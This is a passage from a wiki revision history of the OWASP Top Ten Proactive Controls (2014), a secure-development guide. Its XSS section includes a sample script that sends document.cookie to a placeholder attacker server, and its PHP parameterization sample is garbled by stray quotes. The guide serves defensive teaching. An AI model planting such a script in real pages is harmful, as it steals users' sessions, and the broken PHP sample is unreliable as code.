Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] is a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application: where to add sensors or [https://www.owasp.org/index.php/AppSensor_DetectionPoints detection points] and what response actions [https://www.owasp.org/index.php/AppSensor_ResponseActions response actions] to take when an exception is encountered in your application.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of July: Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176674OWASP Proactive Controls2014-06-09T16:01:50Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] is a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application: where to add sensors or detection points [[AppSensor DetectionPoints]] and what response actions [[AppSensor ResponseActions] to take when an exception is encountered.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of July: Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176572OWASP Proactive Controls2014-06-06T17:08:11Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
